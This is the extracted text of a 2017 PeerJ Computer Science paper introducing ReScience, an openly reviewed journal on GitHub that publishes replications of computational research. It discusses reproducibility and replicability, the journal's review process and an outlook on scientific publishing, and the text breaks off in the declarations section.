record Link to publication from Aalborg University Citation for published version (APA): Rougier, N., Hinsen, K., Alexandre, F., Arildsen, T., Barba, L., Benureau, F., Brown, C. T., de Buyl, P., Caglayan, O., Davison, A., Delsuc, M. A., Detorakis, G., Diem, A., Drix, D., Enel, P., Girard, B., Guest, O., Hall, M., Henriques, R., ... Zito, T. (2017). Sustainable computational science: the ReScience initiative. PeerJ, 3(142e). https://doi.org/10.7717/peerj-cs.142 https://doi.org/10.7717/peerj-cs.142 https://vbn.aau.dk/en/publications/df049490-73ef-44b2-835f-2fc6da4c5ceb https://doi.org/10.7717/peerj-cs.142 Submitted 5 October 2017 Accepted 15 November 2017 Published 18 December 2017 Corresponding author Nicolas P. Rougier, Nicolas.Rougier@inria.fr Academic editor Feng Xia Additional Information and Declarations can be found on page 14 DOI 10.7717/peerj-cs.142 Copyright 2017 Rougier et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Sustainable computational science: the ReScience initiative Nicolas P. Rougier1, Konrad Hinsen2, Frédéric Alexandre1, Thomas Arildsen3, Lorena A. Barba4, Fabien C.Y. Benureau1, C. Titus Brown5, Pierre de Buyl6, Ozan Caglayan7, Andrew P. Davison8, Marc-André Delsuc9, Georgios Detorakis10, Alexandra K. Diem11, Damien Drix12, Pierre Enel13, Benoît Girard14, Olivia Guest15, Matt G. Hall16, Rafael N. Henriques17, Xavier Hinaut1, Kamil S. Jaron18, Mehdi Khamassi14, Almar Klein19, Tiina Manninen20, Pietro Marchesi21, Daniel McGlinn22, Christoph Metzner23, Owen Petchey24, Hans Ekkehard Plesser25, Timothée Poisot26, Karthik Ram27, Yoav Ram28, Etienne Roesch29, Cyrille Rossant30, Vahid Rostami31, Aaron Shifman32, Joseph Stachelek33, Marcel Stimberg34, Frank Stollmeier35, Federico Vaggi36, Guillaume Viejo14, Julien Vitay37, Anya E. Vostinar38, Roman Yurchak39 and Tiziano Zito40 1 INRIA Bordeaux Sud-Ouest, Talence, France 2 Centre de Biophysique Moléculaire UPR4301, CNRS, Orléans, France 3 Department of Electronic Systems, Technical Faculty of IT and Design, Aalborg University, Aalborg, Denmark 4 Department of Mechanical and Aerospace Engineering, The George Washington University, Washington, D.C., USA 5 Department of Population Health and Reproduction, University of California Davis, Davis, CA, USA 6 Instituut voor Theoretische Fysica, KU Leuven, Leuven, Belgium 7 Laboratoire d’Informatique (LIUM), Le Mans University, Le Mans, France 8 UNIC FRE 3693, CNRS, Gif-sur-Yvette, France 9 Institut de Génétique et de Biologie Moléculaire et Cellulaire, Illkirch, France 10 Department of Cognitive Sciences, University of California Irvine, Irvine, CA, USA 11 Computational Engineering and Design, University of Southampton, Southampton, United Kingdom 12 Humboldt Universität zu Berlin, Berlin, Germany 13 Department of Neuroscience, Mount Sinai School of Medicine, New York, NY, USA 14 Institute of Intelligent Systems and Robotics, Sorbonne Universités - UPMC Univ Paris 06 - CNRS, Paris, France 15 Experimental Psychology, University College London, London, Greater London, United Kingdom 16 UCL Great Ormond St Institute of Child Health, London, United Kingdom 17 Champalimaud Centre for the Unknown, Champalimaud Neuroscience Program, Lisbon, Portugal 18 Department of Ecology and Evolution, University of Lausanne, Lausanne, Switzerland 19 Independent scholar, Enschede, The Netherlands 20 BioMediTech Institute and Faculty of Biomedical Sciences and Engineering, Tampere University of Technology, Tampere, Finland 21 Swammerdam Institute for Life Sciences, University of Amsterdam, Amsterdam, The Netherlands 22 Department of Biology, College of Charleston, Charleston, SC, USA 23 Centre for Computer Science and Informatics Research, University of Hertfordshire, Hatfield, United Kingdom 24 Department of Evolutionary Biology and Environmental Studies, University of Zurich, Zurich, Switzerland 25 Faculty of Science and Technology, Norwegian University of Life Sciences, Aas, Norway 26 Département de Sciences Biologiques, Université de Montréal, Montréal, QC, Canada 27 Berkeley Institute for Data Science, University of California, Berkeley, CA, USA 28 Department of Biology, Stanford University, Stanford, CA, USA 29 Centre for Integrative Neuroscience, University of Reading, Reading, United Kingdom 30 Institute of Neurology, University College London, London, United Kingdom How to cite this article Rougier et al. (2017), Sustainable computational science: the ReScience initiative. PeerJ Comput. Sci. 3:e142; DOI 10.7717/peerj-cs.142 https://peerj.com mailto:Nicolas.Rougier@inria.fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.142 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://dx.doi.org/10.7717/peerj-cs.142 31 Institute of Neuroscience & Medicine, Juelich Forschungszentrum, Jülich, Germany 32 Department of Biology, University of Ottawa, Ottawa, Ontario, Canada 33 Department of Fisheries and Wildlife, Michigan State University, East Lansing, MI, USA 34 Sorbonne Universités/UPMC Univ Paris 06/INSERM/CNRS/Institut de la Vision, Paris, France 35 Max Planck Institute for Dynamics and Self-Organization, Göttingen, Lower Saxony, Germany 36 Amazon, Seattle, WA, USA 37 Department of Computer Science, Chemnitz University of Technology, Chemnitz, Saxony, Germany 38 Department of Computer Science, Grinnell College, Grinnell, IA, USA 39 Symerio, Palaiseau, France 40 Neural Information Processing Group, Eberhard Karls Universität Tübingen, Tübingen, Germany ABSTRACT Computer science offers a large set of tools for prototyping, writing, running, testing, validating, sharing and reproducing results; however, computational science lags behind. In the best case, authors may provide their source code as a compressed archive and they may feel confident their research is reproducible. But this is not exactly true. James Buckheit and David Donoho proposed more than two decades ago that an article about computational results is advertising, not scholarship. The actual scholarship is the full software environment, code, and data that produced the result. This implies new workflows, in particular in peer-reviews. Existing journals have been slow to adapt: source codes are rarely requested and are hardly ever actually executed to check that they produce the results advertised in the article. ReScience is a peer-reviewed journal that targets computational research and encourages the explicit replication of already published research, promoting new and open-source implementations in order to ensure that the original research can be replicated from its description. To achieve this goal, the whole publishing chain is radically different from other traditional scientific journals. ReScience resides on GitHub where each new implementation of a computational study is made available together with comments, explanations, and software tests. Subjects Data Science, Digital Libraries, Scientific Computing and Simulation, Social Computing Keywords Computational science, Open science, Publication, Reproducible, Replicable, Sustainable, GitHub, Open peer-review INTRODUCTION There is a replication crisis in Science (Baker, 2016; Munafò et al., 2017). This crisis has been highlighted in fields as diverse as medicine (Ioannidis, 2005), psychology (Open Science Collaboration, 2015), the political sciences (Janz, 2015), and recently in the biomedical sciences (Iqbal et al., 2016). The reasons behind such non-replicability are as diverse as the domains in which it occurs. In medicine, factors such as study power and bias, the number of other studies on the same question, and importantly, the ratio of true to no relationships among the all relationships probed have been highlighted as important causes (Ioannidis, 2005). In psychology, non-replicability has been blamed on spurious p-values (p-hacking), while in the biomedical sciences (Iqbal et al., 2016), a lack of access to full datasets and Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 2/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 detailed protocols for both clinical and non-clinical biomedical investigation is seen as a critical factor. The same remarks were recently issued for chemistry (Coudert, 2017). Surprisingly, the computational sciences (in the broad sense) and computer sciences (in the strict sense) are no exception (Donoho et al., 2009; Manninen, Havela & Linne, 2017) despite the fact they rely on code and data rather than on experimental observations, which should make them immune to the aforementioned problems. When Colberg and colleagues (2016) decided to measure the extent of the problem precisely, they investigated the availability of code and data as well as the extent to which this code would actually build with reasonable effort. The results were dramatic: of the 515 (out of 613) potentially reproducible papers targeted by the study, the authors managed to ultimately run only 102 (less than 20%). These low numbers only reflect the authors’ success at running the code. They did not check for correctness of the code (i.e., does the code actually implement what is advertised in the paper), nor the reproducibility of the results (does each run lead to the same results as in the paper). One example of this problem can be found in Topalidou et al. (2015), in which the authors tried to replicate results obtained from a computational neuroscience model. Source code was not available, neither as supplementary material to the paper nor in a public repository. When the replicators obtained the source code after contacting the corresponding author, they found that it could not be compiled and would be difficult to reuse for other purposes. Confronted with this problem, a small but growing number of journals and publishers have reacted by adopting explicit policies for data and software. Examples can be seen in the PLOS instructions on Materials and Software Sharing and on Data Availability, and in the recent announcement by eLife on forking (creating a linked copy of) software used in eLife papers to GitHub. Such policies help to ensure access to code and data in a well-defined format (Perkel, 2016) but this will not guarantee reproducibility nor correctness. At the educational and methodological levels, things have started to change with a growing literature on best practices for making computations reproducible (Sandve et al., 2013; Crook, Davison & Plesser, 2013; Wilson et al., 2014; Halchenko & Hanke, 2015; Janz, 2015; Hinsen, 2015). Related initiatives such as Software and Data Carpentry (Wilson, 2016) are of note since their goal is to make scientists more productive, and their work more reliable, by teaching them basic computing skills. Such best practices could be applied to already published research codebases as well, provided the original authors are willing to take on the challenge of re-implementing their software for the sake of better science. Unfortunately, this is unlikely since the incentives for doing such time-consuming work are low or nonexistent. Furthermore, if the original authors made mistakes in their original implementation, it seems likely that they will reproduce their mistakes in any re-implementation. REPLICATION AND REPRODUCTION While recognition of the replication crisis as a problem for scientific research has increased over time, unfortunately no common terminology has emerged so far. One reason for the diverse use of terms is that each field of research has its own specific technical and Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 3/17 https://peerj.com http://journals.plos.org/plosone/s/materials-and-software-sharing http://journals.plos.org/plosone/s/data-availability https://elifesciences.org/elife-news/inside-elife-forking-software-used-elife-papers-github http://dx.doi.org/10.7717/peerj-cs.142 social obstacles on the road to publishing results and findings that can be verified by other scientists. Here we briefly summarize the obstacles that arise from the use of computers and software in scientific research, and introduce the terminology we will use in the rest of this article. We note, however, that there is some disagreement about this particular choice of terminology even among the authors of this article. Reproducing the result of a computation means running the same software on the same input data and obtaining the same results. The goal of a reproduction attempt is to verify that the computational protocol leading to the results has been recorded correctly. Performing computations reproducibly can be seen as a form of provenance tracking, the software being a detailed record of all data processing steps. In theory, computation is a deterministic process and exact reproduction should therefore be trivial. In reality, it is very difficult to achieve because of the complexity of today’s software stacks and the tediousness of recording all interactions between a scientist and a computer (although a number of recent tools have attempted to automate such recording, e.g., Guo & Engler, 2011; Davison, 2012; Murta et al., 2015). Mesnard and Barba explain (Mesnard & Barba, 2017) how difficult it can be to reproduce a two-year-old computation even though all possible precautions were taken at the time to ensure reproducibility. The most frequent obstacles are the loss of parts of the software or input data, lack of a computing environment that is sufficiently similar to the one used initially, and insufficient instructions for making the software work. An obstacle specific to numerical computations is the use of floating-point arithmetic, whose rules are subject to slightly different interpretations by different compilers and runtime support systems. A large variety of research practices and support tools have been developed recently to facilitate reproducible computations. For a collection of recipes that have proven useful, see Kitzes, Turek & Deniz (2017). Publishing a reproducible computational result implies publishing all the software and all the input data, or references to previously published software and data, along with the traditional article describing the work. An obvious added value is the availability of the software and data, which helps readers to gain a better understanding of the work, and can be re-used in other research projects. In addition, reproducibly published results are more trustworthy, because many common mistakes in working with computers can be excluded: mistyping parameter values or input file names, updating the software but forgetting to mention the changes in the description of the method, planning to use one version of some software but actually using a different one, etc. Strictly speaking, reproducibility is defined in the context of identical computational environments. However, useful scientific software is expected to be robust with respect to certain changes in this environment. A computer program that produces different results when compiled using different compilers, or run on two different computers, would be considered suspect by most practitioners, even if it were demonstrably correct in one specific environment. Ultimately it is not the software that is of interest for science, but the models and methods that it implements. The software is merely a vehicle to perform computations based on these models and methods. If results depend on hard-to-control Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 4/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 implementation details of the software, their relation to the underlying models and methods becomes unclear and unreliable. Replicating a published result means writing and then running new software based on the description of a computational model or method provided in the original publication, and obtaining results that are similar enough to be considered equivalent. What exactly ‘‘similar enough’’ means strongly depends on the kind of computation being performed, and can only be judged by an expert in the field. The main obstacle to replicability is an incomplete or imprecise description of the models and methods. Replicability is a much stronger quality indicator than reproducibility. In fact, reproducibility merely guarantees that all the ingredients of a computation are well documented. It does not imply that any of them are correct and/or appropriate for implementing the models and methods that were meant to be applied, nor that the descriptions of these models and methods are correct and clear. A successful replication shows that two teams have produced independent implementations that generate equivalent results, which makes serious mistakes in either implementation unlikely. Moreover, it shows that the second team was able to understand the description provided by the first team. Replication can be attempted for both reproducible and non-reproducible results. However, when an attempt to replicate non-reproducible work fails, yielding results too different to be considered equivalent, it can be very difficult to identify the cause of the disagreement. Reproducibility guarantees the existence of a precise and complete description of the models and methods being applied in the original work, in the form of software source code, which can be analyzed during the investigation of any discrepancies. The holy grail of computational science is therefore a reproducible replication of reproducible original work. THE RESCIENCE INITIATIVE Performing a replication is a daunting task that is traditionally not well rewarded. Nevertheless, some people are willing to replicate computational research. The motivations for doing so are very diverse (see Box 1). Students may want to familiarize themselves with a specific scientific domain, and acquire relevant practical experience by replicating important published work. Senior researchers may critically need a specific piece of code for a research project and therefore re-implement a published computational method. If these people write a brand new open source implementation of already published research, it is likely that this new implementation will be of interest for other people as well, including the original authors. The question is where to publish such a replication. To the best of our knowledge, no major journal accepts replications in computational science for publication. This was the main motivation for the creation of the ReScience journal (https://rescience.github.io) by Konrad Hinsen and Nicolas P. Rougier in September 2015. Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 5/17 https://peerj.com https://rescience.github.io http://dx.doi.org/10.7717/peerj-cs.142 Box 1. Authors having published in Rescience explain their motivation. (Stachelek, 2016) I was motivated to replicate the results of the original paper because I feel that working through code supplements to blog posts has really helped me learn the process of scientific analysis. I could have published my replication as a blog post but I wanted the exposure and permanency that goes along with journal articles. This was my first experience with formal replication. I think the review was useful because it forced me to consider how the replication would be used by people other than my- self. I have not yet experienced any new interactions following publication. However, I did notify the author of the original implementation about the replication’s publi- cation. I think this may lead to future correspondence. The original author suggested that he would consider submitting his own replications to ReScience in the future. (Topalidou & Rougier, 2015) Our initial motivation and the main reason for replicating the model is that we needed it in order to collaborate with our neurobiologist colleagues. When we arrived in our new lab, the model had just been published (2013) but the original author had left the lab a few months before our arrival. There was no public repository nor version control, and the paper describing the model was incomplete and partly inaccurate. We managed to get our hands on the original sources (6,000 lines of Delphi) only to realize we could not compile them. It took us three months to replicate it using 250 lines of Python. But at this time, there was no place to publish this kind of replication to share the new code with colleagues. Since then, we have refined the model and made new predictions that have been confirmed. Our initial replication effort really gave the model a second life. (Viejo, Girard & Khamassi, 2016) Replicating previous work is a relatively routine task every time we want to build a new model: either because we want to build on this previous work, or because we want to compare our new model to it. We also give replication tasks to M.Sc. students every year, as projects. In all these cases, we are confronted with incomplete or inaccurate model descriptions, as well as with the impossibility to obtain the original results. Contacting the original authors sometimes solves the problem, but not so often (because of the dog ate my hard drive syndrome). We thus accumulate knowledge, internal to the lab, about which model works and which doesn’t, and how a given model has to be parameterized to really work. Without any place to publish it, this knowledge is wasted. Publishing it in ReScience, opening the discussion publicly, will be a progress for all of us. ReScience is an openly-peer-reviewed journal that targets computational research and encourages the explicit replication of already published research. In order to provide the largest possible benefit to the scientific community, replications are required to be reproducible and open-source. In two years of existence, 17 articles have been published and 4 are currently under review (#20, #39, #41, #43). The editorial board covers a wide range of computational sciences (see http://rescience.github.io/board/) and more than 70 volunteers have registered to be reviewers. The scientific domains of published work Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 6/17 https://peerj.com https://github.com/ReScience/ReScience-submission/pull/20 https://github.com/ReScience/ReScience-submission/pull/27 https://github.com/ReScience/ReScience-submission/pull/30 https://github.com/ReScience/ReScience-submission/pull/30 http://rescience.github.io/board/ http://dx.doi.org/10.7717/peerj-cs.142 are computational neuroscience, neuroimaging, computational ecology and computer graphics, with a majority in computational neuroscience. The most popular programming languages are Python and R. The review process takes about 100 days on average and involves about 50 comments. There is a strong bias towards successful replication (100%); experience has taught us that researchers are reluctant to publish failed replications, even when they can prove that the original work is wrong. For young researchers, there is a social/professional risk in publishing articles that show results from a senior researcher to be wrong. Until we implement a certified anonymized submission process, this strong bias will most likely remain. One of the specificities of the ReScience journal is a publishing chain that is radically different from any other traditional scientific journal, since ReScience lives on GitHub, a platform originally designed for collaborative software development. A ReScience submission is treated very similarly to a contribution to an Open Source software project. One of the consequences is that the whole process, from submission via reviewing to publication, is open for anyone to see and even comment on. Each submission is considered by a member of the editorial board, who may decide to reject the submission if it does not respect the formal publication criteria of ReScience. A submission must contain • a precise reference to the work being replicated, • an explanation of why the authors think they have replicated the paper (same figures, same graphics, same behavior, etc.) or why they have failed, • a description of any difficulties encountered during the replication, • open-source code that produces the replication results, • an explanation of this code for human readers. A complete submission therefore consists of both computer code and an accompanying article, which are sent to ReScience in the form of a pull request (the process used on GitHub to submit a proposed modification to a software project). Partial replications that cover only some of the results in the original work are acceptable, but must be justified. If the submission respects these criteria, the editor assigns it to two reviewers for further evaluation and tests. The reviewers evaluate the code and the accompanying material in continuous interaction with the authors through the discussion section until both reviewers consider the work acceptable for publication. The goal of the review is thus to help the authors meet the ReScience quality standards through discussion. Since ReScience targets replication of already published work, the criteria of importance or novelty applied by most traditional journals are irrelevant. For a successful submission (i.e., partial or full replication) to be accepted, both reviewers must consider it reproducible and a valid replication of the original work. As we explained earlier, this means that the reviewers • are able to run the proposed implementation on their computers, • obtain the same results as indicated in the accompanying paper, Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 7/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 • consider these results sufficiently close to the ones reported in the original paper being replicated. For a failure to replicate submission to be accepted, we require extra steps to be taken. In addition to scrutiny of the submission by reviewers and editors, we will try to contact the authors of the original research, and issue a challenge to the community to spot and report errors in the new implementation. If no errors are found, the submission will be accepted and the original research will be declared non-replicable. Since independent implementation is a major feature of replication work, ReScience does not allow authors to submit replications of their own research, nor the research of close collaborators. Moreover, replication work should be based exclusively on the originally published paper, although exceptions are admitted if properly documented in the replication article. Mistakes in the implementation of computational models and methods are often due to biases that authors invariably have, consciously or not. Such biases will inevitably carry over to a replication. Perhaps even more importantly, cross-fertilization is generally useful in research, and trying to replicate the work of one’s peers might pave the way for a future collaboration, or may give rise to new ideas as a result of the replication effort. LESSONS LEARNED Although ReScience is still a young project, the submissions handled so far already provide valuable experience concerning the reproducibility and replicability of computational work in scientific research. Short-term and long-term reproducibility While some of the reasons for non-reproducibility are specific to each scientific domain, our experience has shown that there are also some common issues that can be identified. Missing code and/or data, undocumented dependencies, and inaccurate or imprecise description appear to be characteristic of much non-reproducible work. Moreover, these problems are not always easy to detect even for attentive reviewers, as we discovered when some articles published in ReScience turned out to be difficult to reproduce for someone else for exactly the reasons listed above. ReScience reviewers are scientists working in the same domain as the submitting authors, because familiarity with the field is a condition for judging if a replication is successful. But this also means that our reviewers share a significant common background with the authors, and that background often includes the software packages and programming languages adopted by their community. In particular, if both authors and reviewers have essential libraries of their community installed on their computers, they may not notice that these libraries are actually dependencies of the submitted code. While solutions to this problem evidently exist (ReScience could, for example, request that authors make their software work on a standard computational environment supplied in the form of a virtual machine), they represent an additional effort to authors and therefore discourage them from submitting replication work to ReScience. Moreover, the evaluation of de-facto reproducibility (‘‘works on my machine’’) Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 8/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 by reviewers is useful as well, because it tests the robustness of the code under small variations in the computational environments that are inevitable in real life. Our goal is to develop a set of recommendations for authors that represent a workable compromise between reproducibility, robustness, and implementation effort. These recommendations will evolve over time, and we hope that with improving technology we will ultimately reach full reproducibility over a few decades. Another issue with reproducibility is that with today’s computing technology, long- term reproducibility can only be achieved by imposing drastic constraints on languages and libraries that are not compatible with the requirements of research computing. This problem is nicely illustrated by Mesnard & Barba (2017) whose authors report trying to reproduce their own work performed two years earlier. Even though Barba’s group is committed to reproducible research practices, they did not escape the many problems one can face when trying to re-run a piece of code. As a consequence, code that is written for ReScience today will likely cease to be functional at some point in the future. The long-term value of a ReScience publication lies not just in the actual code but also in the accompanying article. The combination of the original article and the replication article provide a complete and consistent description of the original work, as evidenced by the fact that replication was possible. Even 5, 10, or 20 years later, a competent scientist should be able to replicate the work again thanks to these two articles. Of course, the new code can also help, but the true long-term value of a replication is the accompanying article. Open reviewing The well-known weaknesses of the traditional anonymous peer-reviewing system used by most scientific journals have motivated many experiments with alternative reviewing processes. The variant adopted by ReScience is similar to the ones used by F1000Research or PeerJ, but is even more radically open: anyone can look at ReScience submissions and at the complete reviewing process, starting from the assignment of an editor and the invitation of reviewers. Moreover, anyone with a GitHub account can intervene by commenting. Such interventions could even be anonymous because a GitHub account is not required to advertise a real name or any other identifying element. ReScience does currently require all authors, editors, and reviewers to provide real names (which however are not verified in any way), but there are valid reasons to allow anonymity for authors and reviewers, in particular to allow junior scientists to criticize the work of senior colleagues without fear of retribution, and we envisage exploring such options in the future. Our experience with this open reviewing system is very positive so far. The exchanges between reviewers and authors are constructive and courteous, without exception. They are more similar in style to a coffee-table discussion than to the judgement/defence style that dominates traditional anonymous reviewing. Once reviewers have been invited and have accepted the task, the editors’ main role is to ensure that the review moves forward, by gently reminding everyone to reply within reasonable delays. In addition, the editors occasionally answer questions by authors and reviewers about the ReScience publishing process. The possibility to involve participants beyond the traditional group of authors, editors, and reviewers is particularly interesting in the case of ReScience, because it can be helpful Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 9/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 to solicit input from the authors of the original study that is being replicated. For example, in one recent case (#28), a reviewer suggested asking the author of the original work for permission to re-use an image. The author intervened in the review and granted permission. Publishing on the GitHub platform GitHub is a commercial platform for collaborative software development based on the popular version control system git. It offers unlimited free use to public projects, defined as projects whose contents are accessible to everyone. All ReScience activities are organized around a few such Open Source projects hosted by GitHub. This is an unusual choice for a scientific journal, the only other journal hosted on GitHub being The Journal of Open Source Software (Smith et al., 2017). In this section, we discuss the advantages and problems resulting from this choice, considering both technical and social issues. There are clear differences between platforms for software development, such as GitHub, and platforms for scientific publishing, such as HighWire. The latter tend to be expensive commercial products developed for the needs of large commercial publishers, although the market is beginning to diversify with products such as Episciences. More importantly, to the best of our knowledge, no existing scientific publishing platform supports the submission and review of code, which is an essential part of every ReScience article. For this reason, the only option for ReScience was to adopt a software development platform and develop a set of procedures that make it usable for scientific publishing. Our experience shows that the GitHub platform provides excellent support for the reviewing process, which is not surprising given that the review of a scientific article containing code is not fundamentally different from the review of code with accompanying documentation. One potential issue for other journals envisaging adoption of this platform is the necessity that submitting authors have a basic knowledge of the version control system Git and of the techniques of collaborative software development. Given the code-centric nature of ReScience, this has not been a major problem for us, and the minor issues have been resolved by our editors providing technical assistance to authors. It is of course possible that potential authors are completely discouraged from submitting to ReScience by their lack of the required technical competence, but so far nobody has provided feedback suggesting that this is a problem. The main inconvenience of the GitHub platform is its almost complete lack of support for the publishing steps, once a submission has successfully passed the reviewing process. At this point, the submission consists of an article text in Markdown format plus a set of code and data files in a git repository. The desired archival form is an article in PDF format plus a permanent archive of the submitted code and data, with a Digital Object Identifier (DOI) providing a permanent reference. The Zenodo platform allows straightforward archiving of snapshots of a repository hosted on GitHub, and issues a DOI for the archive. This leaves the task of producing a PDF version of the article, which is currently handled by the managing editor of the submission, in order to ease the technical burden on our authors. A minor inconvenience of the GitHub platform is its implementation of code reviews. It is designed for reviewing contributions to a collaborative project. The contributor submits new code and modifications to existing code in the form of a ‘‘pull request’’, which other Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 10/17 https://peerj.com https://github.com/ReScience/ReScience-submission/pull/28 http://github.com/ https://git-scm.com/ http://home.highwire.org/ https://www.episciences.org/ https://zenodo.org/ http://dx.doi.org/10.7717/peerj-cs.142 project members can then comment on. In the course of the exchanges, the contributor can update the code and request further comments. Once everybody is satisfied, the contribution is ‘‘merged’’ into the main project. In the case of ReScience, the collaborative project is the whole journal, and each article submission is a contribution proposed as a pull request. This is, however, not a very intuitive representation of how a journal works. It would be more natural to have a separate repository for each article, an arrangement that would also facilitate the final publishing steps. However, GitHub does not allow code review on a new repository, only on contributions to an already existing one. Relying on a free-use offer on a commercial platform poses some additional problems for scientific publishing. GitHub can change its conditions at any time, and could in principle delete or modify ReScience contents at any time without prior notice. Moreover, in the case of technical problems rendering ReScience contents temporarily or permanently inaccessible, the ReScience community has no legal claims for compensation because there is no contract that would imply any obligations for GitHub. It would clearly be imprudent to count on GitHub for long-term preservation of ReScience content, which is why we deposit accepted articles on Zenodo, a platform designed for archiving scientific information and funded by research organizations as an element of public research infrastructure. The use of free services provided by GitHub and Zenodo was clearly important to get ReScience started. The incentives for the publication of replication work being low, and its importance being recognized only slowly in the scientific community, funding ReScience through either author page charges or grants would have created further obstacles to its success. A less obvious advantage of not having to organize funding is that ReScience can exist without being backed by any legal entity that would manage its budget. This makes it possible to maintain a community spirit focused on shared scientific objectives, with nobody in a position to influence ReScience by explicit or implicit threats of reducing future funding. OUTLOOK Based on our experience with the ReScience initiative, we can engage in informed speculation about possible future evolutions in scientific publishing, in particular concerning replication work. We will not discuss minor technical advances such as a better toolchain for producing PDF articles, but concentrate on long-term improvements in the technology of electronic publishing and, most of all, in the attitude of the scientific community towards the publication, preservation, and verification of computer-aided research. A fundamental technical issue is the difficulty of archiving or accurately describing the software environments in which computational scientists perform their work. A publication should be accompanied by both a human-readable description of this environment and an executable binary form. The human-readable description allows an inspection of the versions of all software packages that were used, for example to check for the impact of bugs that become known only after a study was published. The executable version enables other scientists to re-run the analyses and inspect intermediate results. Ideally, the Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 11/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.142 human-readable description would permit rebuilding the executable version, in the same way that software source code permits rebuilding executable binaries. This approach is pursued for example by the package manager Guix (Courtés & Wurmus, 2015). A more limited but still useful implementation of the same idea exists in the form of the conda package manager (Anaconda Inc., 2017), which uses a so-called environment file to describe and reconstruct environments. The main limitation compared to Guix is that the packages that make up a conda environment are themselves not reproducible. For example, a conda environment file does not state which compiler versions were used to build a package. Containerization, as implemented e.g., by Docker (Docker Inc., 2017) is currently much discussed, but provides only the executable version without a human-readable description. Moreover, the long-term stability of the container file format remains to be evaluated. History has shown that long-term stability in computing technology is achieved only by technology for which it is a design priority, as in the case of the Java Virtual Machine (Lindholm & Yellin, 1999). Docker, on the contrary, is promoted as a deployment technology with no visible ambition towards archiving of computational environments. Today’s electronic publishing platforms for scientific research still show their origins in paper-based publishing. Except for the replacement of printed paper by a printable PDF file, not much has changed. Although it is increasingly realized that software and data should be integral parts of most scientific publications today, they are at best relegated to the status of ‘‘supplementary material’’, and systematically excluded from the peer review process. In fact, to the best of our knowledge, ReScience is the only scientific journal that aims to verify the correctness of scientific software. As our experience has shown, it is far easier to graft publication onto a software development platform than to integrate software reviewing into a publishing platform. Furthermore, tools that will allow for the automated validation of computational models and the automated verification of correctness are being actively developed in the community (see, for example, SciUnit or OSB-model-validation). An integration of such frameworks, which would greatly enhance the verification and validation process, seems feasible for the existing software development platforms. A logical next step is to fully embrace the technology designed for software development, which far better takes into account the specificity of electronic information processing than today’s scientific publishing systems. In addition to the proper handling of code, such an approach offers further advantages. Perhaps the most important one is a shift of focus from the paper as a mostly isolated and finished piece of work to scientific progress as a collection of incremental and highly interdependent steps. The Software Heritage project, whose aim is to create a permanent public archive of all publicly available software source code, adopts exactly this point of view for the preservation of software. As our experience with ReScience has shown, integrating the narrative of a scientific article into a framework designed for software development is not difficult at all. Publishing and archiving scientific research in Software Heritage would offer several advantages. The intrinsic identifiers that provide access to the contents of the archive permit unambiguous and permanent references to ongoing projects as well as to snapshots at a specific time, and to whole projects as well as to the individual files that are part of them. Such references hold the promise for better Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 12/17 https://peerj.com https://github.com/scidash/sciunit https://github.com/OpenSourceBrain/osb-model-validation https://www.softwareheritage.org/ http://dx.doi.org/10.7717/peerj-cs.142 ✓ Original work Article Replication (success) Authors A Authors A Authors B Replication (sucess) Certified Article Authors B Authors A+B ✓ ✓ A. ReScience B. CoScience Replication (failure) Authors B ✗ Original work Replication (failure) No publication Authors A Authors B ✗ Feedback to author & editor Feedback to author & editor Figure 1 (A) The ReScience publication chain starts from an original research article by authors A, pub- lished in a journal, in conference proceedings, or as a preprint. This article constitutes the base material for authors B, who attempt to replicate the work based on its description. Success or failure to replicate is not a criterion for acceptance or rejection, even though failure to replicate (continued on next page...) Full-size DOI: 10.7717/peerjcs.142/fig-1 Rougier et al. (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.142 13/17 https://peerj.com https://doi.org/10.7717/peerjcs.142/fig-1 http://dx.doi.org/10.7717/peerj-cs.142 Figure 1 (...continued) requires more precaution to ensure this is not a misunderstanding or a bug in the new code. After review, the replication is published, and feedback is given to original authors (and editors) to inform them the work has been replicated (or not). (B) The CoScience proposal would require the replication to happen before the actual publication. In case of failure, nothing will be published. In case of success, the publica- tion will be endorsed by authors A and authors B with identified roles and will be certified as reproducible because it has been replicated by an independent group. reuse of scientific information, for better reproducibility of computations, and for fairer attribution of credit to scientists who contribute to research infrastructure. One immediate and legitimate question is to wonder to what extent a replication could be performed rior to the publication of the original article. This would strongly reinforce a claim because a successful and independent replication would be available right from the start. As illustrated in Fig. 1, this would require group A to contact group B and send them a draft of their original work (the one that would be normally submitted to a journal) such that group B could perform a replication and confirm or refute the results. In case of confirmation, a certified article could be later published with both groups as authors (each group being identified according to their respective roles). However, if the replication fails and the original work cannot be fixed, this would prevent publication. This model would improve the quality of computational research and also considerably slow down the rapid pace of publication we are observing today. Unfortunately, such a scenario seems highly improbable today. The pressure to publish is so strong and the incentive for doing replication so low that it would most probably prevent such collaborative work. However, we hope that the current replication crisis will lead to a change in attitude, with an emphasis on the quality rather than the quantity of scientific ouput, with CoScience becoming the gold-standard approach to quality assurance. ADDITIONAL INFORMATION AND DECLARATIONS Funding The authors received no funding for this work. Competing Interests Federico Vaggi is an employee of Amazon, Inc., Roman Yurchak is an employee of Symerio, and C. Titus Brown and Nicolas P. Rougier are Academic Editors for 